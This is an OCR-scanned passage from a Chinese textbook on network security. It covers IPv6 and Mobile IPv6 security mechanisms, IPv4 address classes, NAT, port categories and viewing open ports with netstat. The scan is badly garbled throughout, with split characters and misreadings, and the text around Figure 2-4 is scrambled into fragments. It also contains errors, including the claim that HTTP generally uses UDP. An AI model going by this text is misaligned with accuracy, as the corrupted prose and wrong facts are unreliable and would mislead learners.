络 层 以 上 的 安全 问题 ; 与 网 络 层 数据 保密 性 和 完整 性 相关 的 安全 问题 和 与 网 络 层 可 用 性 相 
关 的 安全 问题 。 如 窃听 攻击 ,应 用 层 攻 击 .中 间 人 攻击 、 洪 泛 攻击 等 。 

(2) 网 络 层 以 上 的 安全 问题 : 主要 是 各 种 应 用 层 的 攻击 ,其 原理 和 特征 无 任何 变化 。 

(3) 与 网 络 层 数 据 保密 性 和 完整 性 相关 的 安全 问题 : 主要 是 窃听 攻击 和 中 间 人 攻击 。 
由 于 IPSec 还 没有 解决 大 规模 密 钥 分 配 和 管理 的 难点 ,缺乏 广泛 的 部 署 ,因此 ,在 IPv6 网 络 
中 ,仍然 可 以 存在 窃听 和 中 间 人 攻击 。 

(4) 与 网 络 层 可 用 性 相关 安全 问题 : 主要 是 指 洪 泛 攻击 ,如 TCP SYN Flooding 攻击 。 

(5) 原理 和 特征 发 生 明显 变化 的 安全 问题 ,主要 包括 以 下 4 个 方面 。 

@ 侦 测 。 是 一 种 基本 攻击 方式 ,也 是 网 络 攻击 方式 的 初始 步 又。 黑客 为 攻击 需要 获得 
网 络 地 址 .服务 .应 用 等 尽 可 能 多 的 情报 。IPv4 协议 下 子 网 地 址 空间 只 有 28 ,.IPv6 的 默认 子 
网 地 址 空间 为 264, 如 天 文 数字 。 却 可 运用 一 些 攻击 策略 ,精简 并 加 快 子 网 扫描 。 

@ 非 授 权 访问 。IPv6 下 的 访问 控制 同 IPv4 下 情形 类 似 , 依 赖 防火 墙 或 路 由 器 访问 控 
制 表 (ACL) 等 控制 策略 ,由 地 址 、 端 口 等 信息 实施 控制 。 对 地 址 转换 型 防火 墙 ,外 网 的 终端 
看 不 到 被 保护 主机 的 IP 地 址 ,使 防火 墙 内 部 机 器 免 受 攻击 ,但 是 地 址 转换 技术 (NAT) 和 
IPSec 功能 不 匹配 ,所 以 在 IPv6 下 ,很 难 穿越 地 址 转换 型 防火 墙 以 IPSec 进行 通信 。 

@@ 算 改 分 组 头 部 和 分 段 信息 。 在 IPv4 网 络 中 的 设备 和 端 系统 都 可 对 分 组 进行 分 片 ,分 
片 攻击 通常 用 于 两 种 情形 : 一 是 利用 分 片 逃避 网 络 监控 设备 ,如 防火 墙 和 IDS。 二 是 直接 利 
用 网 络 设备 中 协议 栈 实现 的 漏洞 ,以 错误 的 分 片 分 组 头 部 信息 直接 对 网 络 设 备 发 动 攻击 。 
IPv6 网 络 中 的 中 间 设 备 不 再 分 片 , 由 于 存在 多 个 IPv6 扩展 头 , 从 而 使 网 络 监控 设备 若 不 对 
分 片 进行 重组 ,将 无 法 实施 基于 端口 信息 的 访问 控制 策略 。 

@ 伪造 源 地 址 。 在 IPv4 网 络 中 , 源 地 址 伪造 的 攻击 很 多 ,如 TCP SYN Flooding 等 攻 
击 。 防 范 方法 主要 有 两 类 : 一 是 基于 事前 预防 的 过 滤 类 方法 ; 二 是 基于 事后 追查 的 回溯 类 
方法 。 但 是 这 些 方案 都 存在 部 署 困难 等 缺陷 .由 于 存在 网 络 地 址 转换 (Network Address 
Translation, NAT) ,使 攻击 后 追踪 更 困难 。 在 IPv6 网 络 中 ,一 方面 由 于 地 址 汇聚 ,过滤 类 方 
法 实现 更 简单 且 负载 更 小 ; 另 一 方面 由 于 转换 网 络 地 址 少 且 容易 追踪 。 
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BB. IPv6 的 安全 机 制 


1) 协议 安全 

如 上 所 述 , 在 协议 安全 层面 ,IPv6 全 面 支持 认证 头 AH 认证 和 封装 安全 有 效 载荷 ESP 
扩展 头 。 支 持 数据 源 发 认证 、 完 整 性 和 抗 重 放 攻 击 等 。 

2) 网 络 安全 

IPv6 主要 体现 在 以 下 4 个 方面 。 

(1) 实现 端 到 端 安全 。 在 两 端 主机 上 对 报 文 进行 IPSec 封装 ,中 间 路 由 器 实现 对 有 
IPSec 扩展 头 的 IPv6 报 文 进行 封装 传输 ,从 而 实现 端 到 端的 安全 。 

(2) 提供 内 网 安全 。 当 内 部 主机 与 Internet 上 其 他 主机 通信 时 ,可 通过 配置 IPSec 网 关 
实现 内 网 安全 。 由 于 IPSec 作为 IPv6 的 扩展 报头 不 能 被 中 间 路 由 器 而 只 能 被 目的 节点 解 
析 处 理 , 因 此 ,可 利用 IPSec 隧道 方式 实现 IPSec 网 关 , 也 可 通过 IPv6 扩展 头 中 提供 的 路 由 
头 和 逐 跳 选项 头 结合 应 用 层 网 关 技 术 实 现 。 后 者 实现 方式 更 灵活 ,有 利于 提供 完善 的 内 网 
安全 ,但 较为 复杂 。 

(3) 由 安全 隧道 构建 安全 VPN。 通 过 IPv6 的 IPSec 隧道 实现 的 VPN ,可 在 路 由 器 之 
间 建 立 IPSec 安全 隧道 ,是 最 常用 的 安全 组 建 VPN 的 方式 。IPSec 网 关 路 由 器 实际 上 是 
IPSec 隧道 的 终点 和 起 点 ,为 了 满足 转发 性 能 ,需要 路 由 器 专用 加 密 加 速 板 卡 。 

(4) 隧道 内 套 实现 网 络 安全 。 通 过 隧道 嵌 套 的 方式 可 获得 多 重 安全 保护 , 当 配置 IPSec 
的 主机 通过 安全 隧道 接 人 配置 IPSec 网 关 的 路 由 器 , 且 该 路 由 器 作为 外 部 隧道 的 终 节 点 将 
外 部 隧道 封装 剥 除 时 , 艇 套 的 内 部 安全 隧道 便 构 成 对 内 网 的 安全 隔离 。 

3) 其 他 安全 保障 

网 络 的 安全 威胁 是 多 层面 且 分 布 于 各 层 。 对 物理 层 可 通过 配置 宛 余 设备 、 宛 余 线路 、 安 
全 供电 保障 电磁 兼容 环境 和 加 强 安全 管理 进行 防护 。 对 于 其 以 上 层面 可 采取 的 防范 措施 
包括 : 以 身份 认证 和 安全 访问 控制 协议 对 用 户 访 问 权 限 进行 控制 ; 通过 MAC 地 址 和 IP 地 
址 绑 定 、 限 制 各 端口 的 MAC 地 址 使 用 量 、 设 立 各 端口 广播 包 流 量 门限 ,利用 基于 端口 和 
VLAN 的 ACL 建立 安全 用 户 隧道 等 针对 第 二 层 网 络 的 攻击 防范 ; 通过 路 由 过 滤 、 对 路 由 信 
息 加 密 和 认证 、 定 向 组 播 控 制 \ 提 高 路 由 收敛 速度 ,减轻 振荡 的 影响 等 措施 来 加 强 第 三 层 网 
络 安 全 性 ; 路 由 器 和 交换 机 对 IPSec 的 支持 可 保证 网 络 数据 和 信息 内 容 的 有 效 性 一致 性 及 
完整 性 ,并 为 网 络 安全 提供 更 多 解决 办 法 。 


4. 移动 IPv6 的 安全 性 


移动 IPv6 是 IPv6 的 一 个 重要 组 成 部 分 ,移动 性 是 其 最 大 的 特点 。 引 入 的 移动 IP 协议 
给 网 络 带 来 新 的 安全 隐患 ,需要 其 特殊 的 安全 措施 。 

1) 移动 IPv6 的 特性 

从 IPv4 到 IPv6 ,移动 IP 技术 发 生 了 根本 性 变化 ,IPv6 的 许多 新 特性 也 为 节点 移动 性 
提供 了 更 好 支持 ,如 “无 状态 地 址 自动 配置 "和 “邻居 发 现 ” 等 。 而 且 ,IPv6 组 网 技术 极 大 简 
化 了 网 络 重组 ,可 更 有 效 地 促进 因特网 移动 性 。 
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移动 IPv6 的 高 层 协 议 辨识 作为 移动 节点 唯一 标识 的 归属 地 址 。 当 移动 节点 MN(Move 
Node) 移 动 到 外 网 获得 一 个 转交 地 址 CoA(Care of Address) 时 ,CoA 和 归属 地 址 的 映射 关 
系 称 为 一 个 “ 绑 定 ”。MN 通过 绑 定 注册 过 程 将 CoA 通知 给 位 于 归属 网 络 的 归属 代理 HA 
(Home Agent)。 之 后 ,对 端 通信 节点 CN(Correspondent Node) 发 往 MN 的 数据 包 首先 被 
路 由 到 HA ,然后 HA 根据 MN 的 绑 定 关系 ,将 数据 包 封装 后 发 送 给 MN。 为 了 优化 迁 回路 
由 的 转发 效率 ,移动 IPv6 也 允许 MN 直接 将 绑 定 消息 发 送 到 对 端 CN, 实 现 MN 和 对 端 通 
信 主 机 的 直接 通信 ,而 无 须 经 过 HA 的 转发 。 

2) 移动 IPv6 面临 的 安全 威胁 

移动 IPv6 基本 工作 流程 只 针对 理想 状态 的 互联 网 ,并 未 考虑 现实 网 络 的 安全 问题 。 而 
且 , 移 动 性 的 引入 也 会 带 来 新 安全 威胁 ,如 对 报 文 的 窃听 、 自 改 和 拒绝 服务 攻击 等 。 因 此 ,在 
移动 IPv6 的 具体 实施 中 须 谨 慎 处 理 这 些 安全 威胁 ,以 免 降低 网 络 安 全 级 别 。 

移动 IP 主要 用 于 无 线 网 络 , 不 仅 要 面 对 无 线 网 络 所 有 的 安全 威胁 ,还 要 处 理由 移动 性 
带 来 的 新 安全 问题 ,所 以 ,移动 IP 相对 有 线 网 络 更 脆弱 和 复杂 。 另 外 ,移动 IPv6 协议 通过 
定义 移动 节点 .HA 和 通信 节点 之 间 的 信 令 机 制 , 较 好 地 解决 了 移动 IPv4 的 三 角 路 由 问题 ， 
但 在 优化 的 同时 也 出 现 了 新 的 安全 问题 。 目 前 ,移动 IPv6 受到 的 主要 威胁 包括 拒绝 服务 攻 
击 . 重 放 攻击 和 信息 窃取 等 。 


有 5. 移动 IPv6 的 安全 机 制 


移动 IPv6 协议 针对 上 述 安 全 威胁 ,在 注册 消息 中 通过 添加 序列 号 以 防范 重 放 攻击 ,并 
在 协议 报 文中 引入 时 间 随 机 数 。 对 HA 和 通信 节点 可 比较 前 后 两 个 注册 消息 序列 号 ,并 结 
合 随 机 数 的 散 列 值 ,判定 注册 消息 是 否 为 重 放 攻 击 。 若 消息 序列 号 不 匹配 或 随机 数 散 列 值 
不 正确 , 则 可 作为 过 期 注册 消息 ,不 予 处 理 。 

对 其 他 形式 的 攻击 ,可 利用 “移动 节点 ,通信 节点 "和 “移动 节点 ,归属 代理 ”之 间 信 令 消 
息 传递 进行 有 效 防范 。 移 动 节 点 和 归属 代理 之 间 可 通过 建立 IPSec 安全 联盟 ,以 保护 信和 令 
消息 和 业务 流量 。 由 于 移动 节点 归属 地 址 和 归属 代理 为 已 知 ,所 以 可 以 预先 为 移动 节点 和 
归属 代理 配置 安全 联盟 ,并 使 用 IPSec AH 和 ESP 建立 安全 隧道 ,提供 数据 源 认 证 ,完整 性 
检查 .数据 加 密 和 重 放 攻击 防护 。 

另外 ,移动 IPv6 协议 定义 了 往返 可 路 由 过 程 , 通 过 产生 绑 定 管理 密 钥 实现 对 移动 节点 
和 通信 节点 之 间 控 制 信 令 的 保护 。 


| 2.2 网络 基 础 介绍 | 网 络 基础 介绍 


PP 2.2.1 认识 IP 地址 


Li IP 地 址 概述 


IP 地址 (Internet Protocol Address) 是 一 种 在 Internet 上 的 给 主机 编 址 的 方式 ,也 称 为 
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和 
网 络 协议 地 址 。 常 见 的 了 P 地 址 ,分 为 IPv4 与 IPv6 两 大 类 。 


IPv4 地 址 是 一 个 32 位 的 二 进 制 数 ,通常 被 分 割 为 4 个 “8 位 二 进 制 数 ”( 也 就 是 4 字 
节 )。IP 地 址 通常 用 “点 分 十 进 制 "表示 成 (a. b. c. d) 的 形式 ,其 中 ,a,b,c,d 都 是 0 一 255 之 
间 的 十 进 制 整数 。 例 如 ,点 分 十 进 IP 地 址 100. 4. 5. 6, 实 际 上 是 32 位 二 进 制 的 地 址 
01100100. 00000100. 00000101. 00000110。 

IPv4 就 是 有 4 段 数字 ,每 一 段 最 大 不 超过 255。 由 于 互联 网 的 茵 勃发 展 ,IP 位 址 的 需求 
量 越 来 越 大 ,使 IP 位 址 的 发 放 愈 趋 严格 ,实际 上 ,在 2011 年 2 月 3 日 IPv4 位 地 址 分 配 完毕 。 

地 址 空间 的 不 足 必 将 妨碍 互联 网 的 进一步 发 展 。 为 了 扩大 地 址 空间 , 拟 通过 IPv6 重新 
定义 地 址 空间 。IPv6 采用 128 位 地 址 长 度 。 在 IPv6 的 设计 过 程 中 除了 一 劳 永 逸 地 解决 了 
地 址 短缺 问题 以 外 ,还 考虑 了 在 IPv4 中 解决 不 了 的 其 他 问题 。 

一 个 完整 的 IP 地址 信息 ,应 该 包括 IP 地 址 、 子 网 掩 码 、 默 认 网 关 和 DNS 四 部 分 内 容 。 
当 它 们 协同 工作 时 ,用 户 才能 访问 Internet 并 被 Internet 中 的 计算 机 所 访问 (采用 静态 IP 地 
址 接 人 Internet 时 ,ISP 应 当 为 用 户 提 供 全 部 IP 地 址 信息 )。 

(1) IP 地 址 。 企 业 网 络 使 用 合法 的 IP 地 址 ,由 提供 Internet 接 入 的 服务 商 (ISP) 分 配 
私有 1IP 地 址 后 , 才 可 以 由 网 络 管理 员 自 由 分 配 。 但 网 络 内 部 所 有 计算 机 的 IP 地 址 都 不 能 
相同 ,否则 会 发 生 IP 地 址 冲突 ,导致 网 络 连接 失败 。 

(2) 子 网 掩 码 。 子 网 掩 码 是 与 IP 地 址 结合 使 用 的 一 种 技术 。 其 主要 作用 有 两 个 ,一 是 
用 于 确定 地 址 中 的 网 络 号 和 主机 号 ; 二 是 用 于 将 一 个 网 络 划分 为 若干 个 子 网 。 

(3) 默认 网 关 。 默 认 网 关 是 指 一 台 主 机 如 果 找 不 到 可 用 的 网 关 , 就 把 数据 包 发 送 给 默 
认 指 定 的 网 关 , 由 这 个 网 关 来 处 理 数据 包 。 从 一 个 网 络 向 另 一 个 网 络 发 送信 息 是 必须 要 经 
过 一 个 “门口 ”的 ,这 道门 就 是 网 关 。 

(4) DNS。DNS 服务 用 于 将 用 户 的 域名 请 求 转 换 为 IP 地 址 。 如 果 企 业 网 络 没有 提供 
DNS 服务 , 则 DNS 服务 器 的 IP 地址 应 当 是 ISP 的 DNS 服务 器 。 如 果 企业 网 络 自己 提供 了 
DNS 服务 , 则 DNS 服务 器 的 IP 地 址 就 是 内 部 DNS 服务 器 的 IP 地 址 。 


12. IP 地 址 的 分 类 


最 初 设计 互联 网 络 时 ,为 了 便于 寻 址 以 及 层次 化 构造 网 络 , 每 个 IP 地 址 包括 两 个 标识 
码 (ID) , 即 网 络 ID 和 主机 ID。 同 一 个 物理 网 络 上 的 所 有 主机 都 使 用 同一 个 网 络 ID ,网 络 上 
的 一 个 主机 (包括 网 络 上 工作 站 ,服务 器 和 路 由 器 等 ) 有 一 个 主机 ID 与 其 对 应 。Internet 委 
员 会 定义 了 5 种 IP 地 址 类 型 以 适合 不 同 容 量 的 网 络 , 即 A~EE 类。 其 中 ,A、B、C 三 类 ( 见 
表 2-1) 由 InterNIC 在 全 球 范围 内 统一 分 配 ,D、E 类 为 特殊 地 址 。 


表 2-1 IPv4 地 址 分 类 表 














类 别 | 最 大 网 络 数 耳 地 址 范围 最 大 主机 数 私有 耳 地 址 范围 
A |126(27 一 2) 0. 0. 0. 0 一 127. 255. 255. 255 16 777 214 | 10. 0. 0.0 一 10. 255. 255. 255 
B |16384(2*) 128. 0. 0. 0 一 191. 255. 255. 255 | 65 534 172. 16. 0. 0 一 172. 31. 255. 255 
C |2097152(2*) | 192. 0. 0. 0 一 223. 255. 255. 255 | 254 192. 168. 0. 0 一 192. 168. 255. 255 
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例如 ,一 个 C 类 IP 地址 是 指 ,在 IP 地 址 的 四 段 号 码 中 ,前 三 段 号 码 为 网 络 号 码 , 剩 下 的 
一 段 号 码 为 本 地 计算 机 的 号 码 。 如 果 用 二 进 制 表示 IP 地 址 ,C 类 IP 地 址 就 由 3 字 节 的 网 络 
地 址 和 1 字 节 主机 地 址 组 成 ,网 络 地 址 的 最 高 位 必须 是 110。C 类 IP 地 址 中 网 络 的 标识 长 
度 为 24 位 ,主机 标识 的 长 度 为 8 位 ,C 类 网 络 地 址 数量 较 多 ,有 209 万 余 个 网 络 。 适 用 于 小 
规模 的 局 域 网 络 ,每 个 网 络 最 多 只 能 包含 254 台 计算 机 。C 类 IP 地 址 范围 192. 0. 0. 0 一 
223. 255. 255. 255 (二 进 制 表示 为 : 11000000 00000000 00000000 00000000 一 11011111 
11111111 11111111 11111111)。C 类 IP 地 址 的 子 网 掩 码 为 255. 255. 255. 0 ,每 个 网 络 支持 
的 最 大 主机 数 为 256 一 2 一 254( 台 ) 。 

而 DD 类 IP 地址 在 历史 上 被 叫 作 多 播 地 址 (Multicast Address) , 即 组 播 地 址 。 在 以 太 网 
中 ,多 播 地 址 命名 了 一 组 应 该 在 这 个 网 络 中 应 用 接收 到 一 个 分 组 的 站 点 。 多 播 地 址 的 最 高 
位 必须 是 1110, 范 围 为 224. 0. 0.0 一 239. 255. 255.255。 玉 类 IP 地 址 是 保留 地 址 。 


ls. 公有 地 址 和 私有 地 址 


IP 地 址 类 型 分 为 公有 地 址 和 私有 地 址 两 类 。 

公有 地 址 (Public Address) 由 InterNIC(Internet Network Information Center, 因特网 
信息 中 心 ) 负 责 。 这 些 IP 地 址 分 配给 注册 并 向 Inter NIC 提出 申请 的 组 织 机 构 。 通 过 它 直 
接 访问 因特网 。 

私有 地 址 (Private Address) 属 于 非 注册 地 址 ,专门 为 组 织 机 构 内 部 使 用 。 

以 下 列 出 留用 的 内 部 私有 地 址 。 

A 类 : 10.0.0.0 一 10. 255. 255. 255 。 

B 类 :, 172. 16.0. 0 一 172. 31. 255. 255 。 

C 类 : 192. 168. 0. 0 一 192. 168. 255. 255 。 

一 般 来 讲 , 企 业内 部 IP 和 外 部 IP 之 间 , 还 用 到 了 NAT 技术 。NAT(Network Address 
Translation, 网 络 地 址 转换 ) 是 1994 年 提出 的 。 当 在 专用 网 内 部 的 一 些 主机 本 来 已 经 分 配 
到 了 本 地 IP 地 址 ( 即 仅 在 本 专用 网 内 使 用 的 专用 地 址 ) ,但 现在 又 想 和 因特网 上 的 主机 通信 
(并 不 需要 加 密 ) 时 ,可 使 用 NAT 方法。 

这 种 方法 需要 在 专用 网 连接 到 因特网 的 路 由 器 上 安装 NAT 软件 。 装 有 NAT 软件 的 
路 由 器 叫 作 NAT 路 由 器 , 它 至 少 有 一 个 有 效 的 外 部 全 球 IP 地 址 。 这 样 ,所 有 使 用 本 地 地 址 
的 主机 在 和 外 界 通 信 时 ,都 要 在 NAT 路 由 器 上 将 其 本 地 地 址 转换 成 全 球 IP 地 址 ,才能 和 因 

另外 ,这 种 通过 使 用 少量 的 公有 IP 地 址 代表 较 多 的 私有 IP 地 址 的 方式 ,将 有 助 于 减缓 
可 用 的 IP 地 址 空间 的 枯竭 。 在 RFC 1632 中 有 对 NAT 的 说 明 。 

NAT 不 仅 能 解决 了 IP 地 址 不 足 的 问题 ,而 且 还 能 够 有 效 地 避免 来 自 网 络 外 部 的 攻击 ， 
隐藏 并 保护 网 络 内 部 的 计算 机 。 其 主要 功能 有 两 个 。 

(1) 宽带 分 享 : 这 是 NAT 主机 的 最 大 功能 。 

(2) 安全 防护 : NAT 之 内 的 PC 联机 到 Internet 上 面 时 , 它 所 显示 的 卫 是 NAT 主机 
的 公共 IP, 所 以 客户 端的 PC 当然 就 具有 一 定 程 度 的 安全 了 ,外 界 在 进行 端口 扫描 的 时 候 ， 
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就 侦 测 不 到 源 客户 端的 PC。 


NAT 的 实现 方式 有 三 种 , 即 静 态 转 换 (Static NAT) ,动态 转换 (Dynamic NAT) 和 端口 
多 路 复 用 (Port Address Translation,PAT) 。 

(1) 静态 转换 是 指 将 内 部 网 络 的 私有 IP 地 址 转换 为 公有 IP 地 址 ,IP 地 址 对 是 一 对 一 
的 ,是 一 成 不 变 的 , 某 个 私有 IP 地 址 只 转换 为 某 个 公有 IP 地 址 。 借 助 于 静态 转换 ,可 以 实 
现 外 部 网 络 对 内 部 网 络 中 某 些 特定 设备 (如 服务 器 ) 的 访问 。 

(2) 动态 转换 是 指 将 内 部 网 络 的 私有 IP 地 址 转换 为 公用 IP 地 址 时 ,IP 地 址 是 不 确定 
的 ,是 随机 的 ,所 有 被 授权 访问 上 Internet 的 私有 IP 地 址 可 随机 转换 为 任何 指定 的 合法 IP 
地 址 。 也 就 是 说 ,只 要 指定 哪些 内 部 地 址 可 以 进行 转换 ,以 及 用 哪些 合法 地 址 作为 外 部 地 址 
时 ,就 可 以 进行 动态 转换 。 动 态 转换 可 以 使 用 多 个 合法 外 部 地 址 集 。 当 ISP 提供 的 合法 IP 
地 址 略 少 于 网 络 内 部 的 计算 机 数量 时 ,可 以 采用 动态 转换 的 方式 。 

(3) 端口 多 路 复 用 是 指 改 变 外 出 数据 包 的 源 端口 并 进行 端口 转换 。 采 用 端口 多 路 复 用 
方式 ,内 部 网 络 的 所 有 主机 均 可 共享 一 个 合法 外 部 IP 地 址 实现 对 Internet 的 访问 ,从 而 可 
以 最 大 限度 地 节约 IP 地 址 资源 。 同 时 ,又 可 隐藏 网 络 内 部 的 所 有 主机 ,有 效 避 免 来 自 
Internet 的 攻击 。 因 此 ,目前 网 络 中 应 用 最 多 的 就 是 端口 多 路 复 用 方式 。 


14. 几 个 特殊 的 IP 地 址 


(1) 每 字 节 都 为 0 的 地 址 (0. 0.0. 0) 对 应 于 当前 主机 。 

(2) 网 络 ID 的 第 一 个 8 位 组 也 不 能 全 置 为 0, 全 0 表示 本 地 网 络 。 

(3) IP 地 址 中 的 每 字 节 都 为 1 的 IP 地 址 (255. 255. 255. 255) 是 当前 子 网 的 广播 地 址 。 

(4) 主机 部 分 为 全 1 的 地 址 ,为 向 当前 网 络 广播 的 广播 地 址 。 

(5) IP 地 址 中 不 能 以 十 进 制 127 作为 开头 ,该 类 地 址 中 127. 0. 0. 1 一 127. 255. 255. 255 
用 于 回路 测试 ,如 127.0.0.1 可 以 代表 本 机 IP 地 址 ,用 http://127. 0.0.1 就 可 以 测试 本 机 
中 配置 的 Web 服务 器 。 





PP 2.2.2 认识 端口 


在 网 络 技术 中 ,端口 大 致 有 两 种 含义 : 一 是 物理 意义 上 的 硬件 接口 ,如 集线器 .路 由 器 
等 用 于 连接 其 他 网 络 设备 的 接口 ; 二 是 逻辑 意义 上 的 端口 ,一般 是 指 TCP/IP 协议 中 的 端 
口 ,范围 为 0 一 65535, 如 浏览 网 页 服务 的 80 端口 ,用 于 FTP 服务 的 21 端口 等 。 

一 台 拥有 IP 地 址 的 主机 可 以 提供 许多 服务 ,比如 Web 服务 .FTP 服务 .SMTP 服务 等 ， 
这 些 服务 完全 可 以 通过 1 个 IP 地 址 来 实现 。 那 么 ,主机 是 怎样 区 分 不 同 的 网 络 服务 呢 ? 显 
然 不 能 只 靠 IP 地 址 ,因为 IP 地 址 与 网 络 服 务 的 关系 是 一 对 多 的 关系 。 实 际 上 是 通过 “IP 地 
址 十 端口 号 ”来 区 分 不 同 的 服务 的 。 

需要 注意 的 是 ,端口 并 不 是 一 一 对 应 的 。 比 如 你 的 计算 机 作为 客户 机 访问 一 台 WWW 
服务 器 时 ,WWW 服务 器 使 用 80 端口 与 你 的 计算 机 通信 ,但 你 的 计算 机 则 可 能 使 用 3457 这 
样 的 端口 。 
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Li 端口 分 类 标准 


逻辑 意义 上 的 端口 有 多 种 分 类 标准 ,常见 的 分 类 标准 有 如 下 两 种 。 

按照 端口 号 的 大 小 分 类 ,可 分 为 以 下 几 类 。 

(1) 公认 端口 (Well Known Ports) : 端口 号 为 0 一 1023 ,它们 紧密 绑 定 (Binding) 于 一 些 
服务 。 通 常 这 些 端口 的 通信 明确 表明 了 某 种 服务 的 协议 。 例 如 : 80 端口 实际 上 总 是 HTTP 
通信 。 

(2) 注册 端口 (Registered Ports) : 端口 号 为 1024 到 49151。 它 们 松散 地 绑 定 于 一 些 服 
务 。 也 就 是 说 有 许多 服务 绑 定 于 这 些 端口 ,这些 端口 同样 用 于 许多 其 他 目的 。 例 如 : 许多 
系统 处 理 动态 端口 从 1024 左右 开始 。 

(3) 动态 和 /或 私有 端口 (Dynamic and/or Private Ports) : 端口 号 为 49152 到 65535 。 
理论 上 ,不 应 为 服务 分 配 这 些 端口 。 实 际 上 ,机 器 通常 从 1024 起 分 配 动 态 端口 。 但 也 有 例 
外 : SUN 的 RPC 端口 号 从 32768 开始 。 

按 协议 类 型 划分 。 根 据 所 提供 的 服务 方式 ,端口 又 可 划分 为 使 用 TCP 端口 (面向 连接 ， 
如 打 电 话 ) 和 使 用 UDP 端口 (无 连接 ,如 写 信 ) 两 种 。 常 见 的 服务 器 应 用 端口 如 表 2-2 所 示 。 


表 2-2 常见 的 服务 器 应 用 端口 



































服 务 端口 服 务 端口 
FTP 21 Telnet 23 
SMTP 25 DNS 53 
HTIP 80 POP3 110 
RPC 135 NetBIOS 139/445 
HTTPS 443 MSSQL 1433/1434 
Oracle 1521/1526 MySQL 3306 
微软 远程 桌面 3389 Tomcat 8080 


使 用 TCP 协议 的 一 般 有 FTP、Telnet、SMTP、POP3 等 。 使 用 UDP 协议 的 一 般 有 
HTTP、DNS、SNMP 等 。 如 QQ 程序 一 般 采 用 UDP 协议 ,QQ 服务 器 使 用 8000 号 端口 侦 
听 是 否 有 信息 到 来 ,客户 端 使 用 4000 号 端口 向 外 发 送信 息 。 


2 查看 端口 示例 


为 了 查找 目标 主机 上 开启 了 哪些 端口 ,可 以 使 用 端口 扫描 工具 对 目标 主机 进行 指定 范 
围 内 的 端口 扫描 。 下 面 简单 介绍 两 种 端口 查看 方式 。 

(1) 在 Windows 系统 中 ,可 以 使 用 netstat 命令 查看 端口 。 在 “命令 提示 符 ” 窗 口中 运行 
netstat -a -n 命令 , 即 可 看 到 以 数字 形式 显示 的 TCP 和 UDP 连接 的 端口 号 及 其 状态 。 如 
图 2-4 所 示 , 查 看 到 本 机 的 端口 状态 。 

端口 状态 一 般 有 : LISTENING、ESTABLISHED、TIME_WAIT 及 CLOSE_WAIT 
种 状态 。 如 FTP 服务 启动 后 首先 处 于 侦 听 (LISTENING) 状 态 ; ESTABLISHED 的 意思 是 
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LISTENING 
LISTENING 
LISTENING 
LISTENING 
LISTENING 
LISTENING 
LISTENING 
LISTENING 
LISTENING 
LISTENING 
LISTENING 
LISTENING 





建立 连接 ,表示 两 台 机 器 正 





本 身 占 用 的 资源 不 会 被 释放 。 
用 连接 完全 断 开 ,否则 大 量 
的 状态 有 两 个 : CLOSE _ 


全 和 7 
BE 








用 close() 来 使 连接 正确 关闭 。 


图 2-4 


通信 。 
行 四 次 握 open 果 缺 少 了 其 中 某 个 步骤 ,将 会 


E 的 连接 会 浪费 许多 服务 器 资源 。 
WAIT 和 TIME_WAIT。 
闭 连 接 或 者 网 络 异常 导致 连接 中 断 ,六 
TIME_WAIT 是 指 我 方 


用 netstat 命令 查看 端口 


而 TCP 协议 规定 ,对 于 已 经 建立 的 连接 ,网 络 双方 要 进 
使 连接 处 于 假死 状态 ,连接 
网 络 服务 器 程序 要 同时 管理 大 量 连接 ,所 以 很 有 必要 保证 无 
在 众多 TCP 状态 中 ,最 值 
CLOSE_WAIT 是 指 对 方 主动 关 
长 CLOSE_WAIT, 此 时 我 方 要 调 
主动 调用 close() 断 开 连 接 , 收 到 对 





这 时 我 方 的 状态 








方 确 认 后 状态 变 为 TIME_WAIT。 


如 果 在 管理 员 不 知情 的 和 况 





服务 而 管理 员 没 有 注意 到 ; 
行 通信 。 ai 


系统 。 

(2) 在 线 扫描 网 络 
在 浏览 器 中 输入 网 址 h 
列 出 要 扫描 的 特定 端 f 


vp / 


号 , 单 击 “ 





服务 器 的 指定 端口 。 


tool. chinaz. com/ port 


Ra 太 多 端口 , 则 可 能 出 现 两 种 情况 : 一 种 是 提供 了 
是 服务 器 被 攻击 者 植 人 了 木马 程序 ,通过 特殊 的 端口 进 


管理 员 荐 不 了 解 服务 器 提供 的 服务 就 会 降低 系统 的 安全 
打开 站 长 工具 网 站 ,选择 IP 类 工具 (端口 扫描 )。 
.输入 网 络 服务 器 的 IP 地 址 或 域名 ,并 
按钮 ,如 图 2-5 所 示 。 等 待 一 段 时 间 后 ,可 在 当 





开始 扫描 ” 


前 网 页 上 查看 到 扫描 的 结果 ,如 图 2-6 所 示 。 


3. 开启 和 关闭 端口 示例 
默认 情况 下 ,Windows 系统 中 有 很 多 端口 是 开放 的 。 在 用 户 上 网 时 ,网 络 病毒 和 黑客 可 


以 通过 这 些 端口 连接 到 用 户 的 计算 机 。 为 了 


口 , 主 要 有 TCP 端口 135、139、44 
的 后 


让 计算 机 系统 变 得 更 加 安全 ,应 该 关闭 这 些 
5、593、1025 和 UDP 端口 137、138、445, 以 及 地 流行 痢 过 


后 门 端口 (如 TCP 端口 2745、3127、6129 等 ) 以 及 远程 服务 端口 3389。 
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80,8080,3128,8081,9080,1080,21,23,443,69,22,25,110,7001,9090,3389,1521,1158,2100,1433 


多 个 请 口号 请 用 去 号 隔 开 , 例 : 8080,8081 





开始 扫描 





图 2-5 在 线 扫描 网 络 服务 器 端口 





80 开放 8080 关闭 3128 关闭 

8081 关闭 9080 关闭 1080 关闭 
21 关闭 3 美 同 443 关闭 
69 关 河 22 美 闭 25 关闭 
110 关闭 7001 关闭 9090 关闭 
3389 3 1521 关 间 1158 关 问 
2100 关闭 1433 开放 





图 2-6 网 络 服务 器 端口 状态 

1) 开启 端口 

在 Windows 系统 中 开启 端口 的 具体 操 步骤 如 下 。 

(1) 在 “控制 面板 ”中 选择 “管理 工具 ”选项 ,并 打开 “服务 ”窗口 ; 或 者 在 开始 菜单 中 , 直 
接 输入 命令 services. msc, 打 开 “ 服 务 ” 窗 口 。 

(2) 在 “服务 "窗口 可 以 查看 服务 项 目 , 选 定 要 启动 的 服务 ,如 图 2-7 所 示 的 Application 
Identity 服务 , 右 击 该 服务 ,在 弹出 的 快捷 菜单 中 选择 “属性 ”命令 。 

(3) 如 图 2-8 所 示 , 在 “启动 类 型 "下拉 列 表 中 选择 “自动 ”选项 ,然后 单 击 “ 启 动 ”按钮 。 
启动 成 功 后 单 击 “ 确 定 ” 按 钮 。 接 下 来 就 可 以 看 到 该 服务 ,如 图 2-9 所 示 ,“ 状 态 ” 已 标记 为 
“已 启动 ”, 启 动 类 型 为 “自动 ”。 

2) 关闭 端口 

